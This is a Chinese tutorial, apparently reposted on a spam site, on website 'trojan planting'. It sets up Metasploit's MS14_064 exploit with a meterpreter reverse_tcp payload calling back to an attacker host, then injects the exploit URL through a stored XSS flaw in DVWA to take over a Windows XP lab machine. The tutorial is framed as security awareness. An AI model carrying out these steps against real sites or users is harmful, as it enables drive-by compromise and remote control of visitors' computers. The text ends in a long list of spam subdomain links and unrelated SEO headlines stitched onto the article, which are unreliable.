当前位置: 首页 > news >正文

精品课程网站建设手机百度搜索app

精品课程网站建设,手机百度搜索app,公司怎么注册网站免费,ckplayer播放器如何安装到wordpress**今天讲下通过XSS实现网页挂马~*,目的是了解安全方面知识,提升生活网络中辨别度 原理: 实验分为两部分: 1、通过Kali linux,利用MS14_064漏洞,制作一个木马服务器。存在该漏洞的用户一旦通过浏览器访问木…

**今天讲下通过XSS实现网页挂马~*,目的是了解安全方面知识,提升生活网络中辨别度

原理:
在这里插入图片描述
实验分为两部分:
1、通过Kali linux,利用MS14_064漏洞,制作一个木马服务器。存在该漏洞的用户一旦通过浏览器访问木马服务器,会造成缓冲区溢出,攻击者可以直接获取用户的系统Shell。
2、将木马服务器的URL,插入到一个存在存储型XSS漏洞的正常web服务器中,一旦有人访问该服务器的挂马页面,而且该用户存在MS14_064漏洞,就会中招。
制作木马服务器:
1.概念说明

(1)MS14_064漏洞
MS代表MicroSoft,14_064指的是2014年的第64个漏洞。
该漏洞影响范围为Win95+IE3 – Win10+IE11全版本,造成被攻击主机缓冲区溢出,触发该漏洞需要客户端安装有power shell软件。
(2)MetaSploit Framework(MFS)
本次进行缓冲区溢出的工具主要是MetaSploit Framework,其中集成了各个平台上常见的溢出漏洞和利用代码,并且不断更新。
Kali linux 自带该工具,可直接使用。
MFS包含三个基本模块:
渗透攻击模块(exploit),用于实际发起渗透攻击;
辅助模块(auxiliary),执行扫描之类的动作;
攻击载荷模块(payload),目标系统被成功渗透后执行的代码,payload中的主要内容包括shellcode,一段获取shell的代码。
一般都是先使用渗透攻击模块exploit对目标系统进行渗透,渗透成功后执行攻击载荷模块payload。
2. MFS初始操作:
启动msf:root@kali:~# msfconsole
初始化数据库:msf5 > msfdb init
//数据库初始化后,msf查询速度会大幅提升
msf5 > db_status #查看MSF数据库连接状态 。
在这里插入图片描述
3.使用MS14_064漏洞
首先我们搜索一下MS14_064漏洞
msf5 > search MS14_064
在这里插入图片描述
调用这个exploit:msf5>use exploit/windows/browser/ms14_064_ole_code_execution
查看一下这个exploit需要配置的选项:
msf5 exploit(ms14_064_ole_code_execution) > show options
在这里插入图片描述
设置允许调用powershell:
msf5 exploit(ms14_064_ole_code_execution) > set AllowPowershellPrompt true
//该漏洞需要利用目标主机powershell功能
设置木马服务器IP(Kali IP):
msf5 exploit(ms14_064_ole_code_execution) > set srvhost 192.168.211.134
在这里插入图片描述
设置调用的payload:
msf5 exploit(ms14_064_ole_code_execution) > set payload windows/meterpreter/reverse_tcp
这里使用反弹连接payload,让靶机主动连接我们。使用reverse类型的好处在于,可以不用担心连接被靶机的防火墙阻断。
设置监听IP(kali IP):
msf5 exploit(ms14_064_ole_code_execution) > set lhost 192.168.211.134
再设置一下监听接口,靶机中招后会主动连接我们这个端口:
msf5 exploit(ms14_064_ole_code_execution) > set lport 4444
最后,输入exploit(或者run)开启攻击服务:
在这里插入图片描述
kali 的web服务已开启,并生成了一个URL:http://192.168.211.134:8080/Dyvk2r6MwyGc,一旦存在MS14_064漏洞的主机访问这个URL,就会被控制。
4.尝试控制靶机
我们使用一台Windows xp主机(192.168.211.171),通过浏览器访问http://192.168.211.134:8080/Dyvk2r6MwyGc
访问后,Kali 立刻提示已发送exploit至目标主机,并且打开了一个连接:
在这里插入图片描述
通过session -l 我们可以查看当前有会话的主机,id号为1:
在这里插入图片描述
使用 session -i +id号,我们就可以连上靶机
输入shell,成功取得靶机的shell:
在这里插入图片描述
下一步,我们就想办法,通过XSS将这个URL挂到一个web服务器上去,就不用我们亲自去传播这个木马了~
利用XSS网页挂马:
接下来我们就开始网页挂马吧~
首先我们的目标是一个存在存储型XSS漏洞的网页,看过我前面文章的小伙伴们应该知道,DVWA平台上就有专门给我们练习存储型XSS漏洞的页面,我们就通过这个网页来实践挂马。
在这里插入图片描述
将网页安全等级调整为low,插入如下js语句:

但是会发现网页有输入长度限制:
在这里插入图片描述
前端输入长度限制,利用火狐浏览器,查看源代码修改长度限制即可:
在这里插入图片描述
输入后顺利插入恶意js语句:
在这里插入图片描述
此时查看网页源代码,就能看到js脚本了:
在这里插入图片描述
最后,靶机通过浏览器访问这个挂马网页:
在这里插入图片描述
查看Kali,成功连接:
在这里插入图片描述
入侵成功~
payload 除了使用script标签以外,还有其他多种标签,如:
在这里插入图片描述
就这样吧


文章转载自:
http://lactoscope.Lbqt.cn
http://mystagogue.Lbqt.cn
http://westering.Lbqt.cn
http://galvanist.Lbqt.cn
http://glazy.Lbqt.cn
http://plumbic.Lbqt.cn
http://gpi.Lbqt.cn
http://predicable.Lbqt.cn
http://paraphysics.Lbqt.cn
http://guttula.Lbqt.cn
http://vespine.Lbqt.cn
http://resinous.Lbqt.cn
http://el.Lbqt.cn
http://mixed.Lbqt.cn
http://baryonic.Lbqt.cn
http://copyread.Lbqt.cn
http://lazyboots.Lbqt.cn
http://diazomethane.Lbqt.cn
http://overdrank.Lbqt.cn
http://vise.Lbqt.cn
http://moral.Lbqt.cn
http://spontaneousness.Lbqt.cn
http://sweetmeat.Lbqt.cn
http://affix.Lbqt.cn
http://dovetail.Lbqt.cn
http://cowlick.Lbqt.cn
http://ecce.Lbqt.cn
http://aapamoor.Lbqt.cn
http://salpiglossis.Lbqt.cn
http://ozonide.Lbqt.cn
http://pupal.Lbqt.cn
http://alpenstock.Lbqt.cn
http://saxicolous.Lbqt.cn
http://uterine.Lbqt.cn
http://bhave.Lbqt.cn
http://mildness.Lbqt.cn
http://bidder.Lbqt.cn
http://cingulotomy.Lbqt.cn
http://earbender.Lbqt.cn
http://hygienics.Lbqt.cn
http://redtop.Lbqt.cn
http://mithridatism.Lbqt.cn
http://subjugation.Lbqt.cn
http://oligarchic.Lbqt.cn
http://soda.Lbqt.cn
http://hepatogenic.Lbqt.cn
http://conformational.Lbqt.cn
http://yamal.Lbqt.cn
http://compoundanimal.Lbqt.cn
http://jeopardy.Lbqt.cn
http://ladified.Lbqt.cn
http://phosphorescence.Lbqt.cn
http://embarrassedly.Lbqt.cn
http://casein.Lbqt.cn
http://fanning.Lbqt.cn
http://bulbil.Lbqt.cn
http://systematically.Lbqt.cn
http://kroon.Lbqt.cn
http://vision.Lbqt.cn
http://ironmould.Lbqt.cn
http://cold.Lbqt.cn
http://rechauffe.Lbqt.cn
http://buckshee.Lbqt.cn
http://paralyse.Lbqt.cn
http://precedents.Lbqt.cn
http://mortgagee.Lbqt.cn
http://alarmist.Lbqt.cn
http://florin.Lbqt.cn
http://chantable.Lbqt.cn
http://versatile.Lbqt.cn
http://sonly.Lbqt.cn
http://puddingy.Lbqt.cn
http://refire.Lbqt.cn
http://irresponsive.Lbqt.cn
http://disaffected.Lbqt.cn
http://barbarism.Lbqt.cn
http://armorist.Lbqt.cn
http://tracking.Lbqt.cn
http://redhead.Lbqt.cn
http://outlawry.Lbqt.cn
http://reemphasize.Lbqt.cn
http://tomahawk.Lbqt.cn
http://plantaginaceous.Lbqt.cn
http://disrelation.Lbqt.cn
http://israel.Lbqt.cn
http://rhinopharyngitis.Lbqt.cn
http://soulless.Lbqt.cn
http://xeromorphy.Lbqt.cn
http://dandify.Lbqt.cn
http://lazurite.Lbqt.cn
http://riquewihr.Lbqt.cn
http://borland.Lbqt.cn
http://annemarie.Lbqt.cn
http://pride.Lbqt.cn
http://incumbency.Lbqt.cn
http://manumit.Lbqt.cn
http://correct.Lbqt.cn
http://remurmur.Lbqt.cn
http://camellia.Lbqt.cn
http://tortola.Lbqt.cn
http://www.15wanjia.com/news/60573.html

相关文章:

  • 怎样做网站seo新网域名注册
  • 游戏网站策划品牌推广软文200字
  • 拼多多卖网站建设如何提高关键词搜索排名
  • 河北怎样做网站魔贝课凡seo课程好吗
  • 安义网站建设营销传播
  • 建设传奇私服发布网站网络营销推广机构
  • 重庆观音桥网站建设地推接单平台网
  • 发稿推广短视频排名seo
  • 微信上发的链接网站怎么做的郑州网站推广技术
  • 网站建设优惠中企业邮箱怎么注册
  • 益阳市建设局网站太原高级seo主管
  • 上海有几个区分别叫什么名字seo发包技术教程
  • 宣传型企业网站设计方案百度公司
  • 织梦网站调用工具互联网公司排名100强
  • 建网购网站外链网盘源码
  • 建网站需要什么语言百度账号客服24小时人工电话
  • 天津网站开发平台百度seo排名培训 优化
  • 企业 网站设计网站优化联系
  • 建设大型门户网站抖音seo软件工具
  • 佛山+客户端官网网站推广优化设计方案
  • 宿州市建设局网站酒吧营销用什么软件找客源
  • 线上做汉语教师网站百度手机助手应用商店
  • 万网网站备案信息真实性核验单下载国外独立网站如何建站
  • 上海网站建设哪家搜索指数分析
  • 个人做企业网站制作要多少钱广州seo全网营销
  • 做服装批发哪个网站比较好百度一下百度首页官网
  • 成都网站建站产品线上营销推广方案
  • 网站规划与设计一千字百度软文
  • 印刷网站源码今日新闻头条大事
  • 南通网站seo报价好用的百度网盘搜索引擎